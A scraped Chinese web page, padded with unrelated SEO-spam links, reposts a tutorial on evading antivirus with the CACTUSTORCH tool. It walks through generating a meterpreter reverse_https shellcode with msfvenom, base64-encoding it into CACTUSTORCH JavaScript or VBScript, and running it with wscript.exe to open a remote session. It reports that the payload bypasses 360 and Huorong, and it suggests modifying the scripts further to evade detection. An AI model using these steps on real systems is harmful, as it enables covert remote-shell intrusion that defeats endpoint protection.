当前位置: 首页 > news >正文

跨境进口网站怎么做网络推广公司

跨境进口网站怎么做,网络推广公司,赣州市经开区住房和建设局网站,住房和城乡建设部电工证转载#xff1a;https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw 免杀能力一览表 几点说明#xff1a; 1、上表中标识 √ 说明相应杀毒软件未检测出病毒#xff0c;也就是代表了Bypass。 2、为了更好的对比效果#xff0c;大部分测试payload均使用msf的windows/mete…转载https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw 免杀能力一览表 几点说明 1、上表中标识 √ 说明相应杀毒软件未检测出病毒也就是代表了Bypass。 2、为了更好的对比效果大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒所以默认情况下360和火绒杀毒情况指的是静态动态查杀。360杀毒版本5.0.0.8160(2020.01.01)火绒版本5.0.34.16(2020.01.01)360安全卫士12.0.0.2002(2020.01.01)。 4、其他杀软的检测指标是在virustotal.com简称VT上在线查杀所以可能只是代表了静态查杀能力数据仅供参考不足以作为免杀或杀软查杀能力的判断指标。 5、完全不必要苛求一种免杀技术能bypass所有杀软这样的技术肯定是有的只是没被公开一旦公开第二天就能被杀了其实我们只要能bypass目标主机上的杀软就足够了。 一、CACTUSTORCH介绍 在2017年4月由James Forshaw开源了一个工具DotNetToJScript能够利用JS或者Vbs等脚本加载.Net程序。在DotNetToJScript发布后有几款工具根据其原理开发出来比如CACTUSTORCH、SharpShooter、StarFighters等等。 而CACTUSTORCH和SharpShooter都同一个组织开发2017年发布主要使用vbs或js执行C#的二进制payload提供多种方式绕过杀软支持js、vbs、vbe、vba、hta等多种格式还提供了支持Cobalt Strike的cna文件。 二、安装CACTUSTORCH CACTUSTORCH安装和使用都比较简单。 1、从Github上clone到本地 git clone https://github.com/mdsecactivebreach/CACTUSTORCH2、ok了纯绿色版就这么简单。 三、CACTUSTORCH说明 CACTUSTORCH生成的脚本可以用于执行C#的二进制文件CACTUSTORCH在免杀方面有以下几个特性 1、在payload中不使用Kernel32 API声明避免被杀软检测 2、可以在C二进制内机械能混淆 3、可任意指定目标二进制程序进行注入 4、允许指定任意shellcode 5、不产生PowerShell.exe 6、不需要Powershell 7、不需要office 8、不调用WScript.Shell 9、不需要分段因为完整的无阶段shellcode可以包含在传送的payload内 10、没有静态父对子进行生成用户可以更改wscript.exe生成的内容 四、利用CACTUSTORCH生成后门 以生成js脚本为例进行测试。 1、首先要选择一个待注入的exe文件默认是rundll32.exe, 你也可以使用notepad.exe, calc.exe等在CACTUSTORCH.js文件中直接修改就行。 2、使用 Cobalt Strike或Metasploit生成一个32位的shellcode msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST10.211.55.2 LPORT3333 -f raw -o payload.bin3、执行下面命令cat payload.bin | base64 -w 0 4、把生成的base64编码后的代码复制到CACTUSTORCH.js文件中的var code 。 如果是vbs文件则需要修改CACTUSTORCH.vbs文件中Dim code: code 后面的代码。 如果是生成VBA代码还需要使用splitvba.py来对代码进行分割详细可查阅官方说明https://github.com/mdsecactivebreach/CACTUSTORCH。 5、在测试机中执行wscript.exe CACTUSTORCH.js msf中监听windows/meterpreter/reverse_https可正常上线 6、打开杀软进行测试 360和火绒都免杀都可正常上线 7、测试了一下vbs也可360和火绒免杀上线 又测试了一下vba免杀效果也差不多。 五、CACTUSTORCH小结 因为CACTUSTORCH也是基于DotNetToJScript来实现免杀的工具同类工具里知名度比较高所以被查杀的有些惨不忍睹不过能直接过360和火绒也算一个小亮点了。杀软查杀其脚本主要是里面很多代码关键字都被列入了特征字符感兴趣的可以尝试修改其脚本代码做二次免杀。 六、参考资料 DotNetToJScript 复活之路:https://evi1cg.me/archives/AMSI_bypass.html 使用CACTUSTORCH 生成Payload:http://4hou.win/wordpress/?p4727
http://www.pierceye.com/news/143846/

相关文章:

  • 石家庄网站建设电话重庆最便宜的网站建设
  • 人才网站建设策划书pc网站建设
  • 做网站用哪几个端口 比较好微信营销
  • 网站开发价格有专业做网站的吗网站公司
  • 西安网站建设全包做网站要多少
  • 如何建设传奇网站怎样做招嫖网站
  • 企石镇网站仿做连云港网站开发
  • php 网站做分享功能重庆建设工程信息网30系统
  • 西部数码创建php网站北京上云网站建设公司
  • 中标建设集团有限公司 网站游戏开发软件有哪些
  • 上饶哪里做网站办公家具网站建设公司
  • 建设银行园湖路支行网站外贸网站建设需要注意什么
  • 失物招领网站开发项目需求分析app开发定制公司哪家好做
  • 网站不用备案阿里云 wordpress搭建网站
  • 重庆网站推广软件小朋友做安全教育的网站
  • 商家自己做的商品信息查询网站互联网有哪些行业
  • 用dw做网站时怎么添加弹窗知名网站服务器
  • 网站备案做优惠券第一营销网
  • 网站策划的基本过程全国大型网站建设
  • 个人外贸网站杭州微网站建设公司
  • wordpress皮肤下载站安徽建设工程信息网官方网站
  • 自己的电脑做服务器 并建网站asp sql网站安全性
  • 创新创业营销策略网站建设等信息系统开发计划
  • 安徽建设信息网站做胃镜多少钱天津津门网站I
  • jrs直播网站谁做的广告设计与制作专升本
  • 辽 icp 大连 网站建设个人网站做的类型
  • 做网站搞友情链接网站建设有哪些类型
  • 网站建设更新维护工作总结网站建设源文件
  • 公益网站 html 模板wordpress权限acl
  • 廊坊市网站建设企业网站设计特点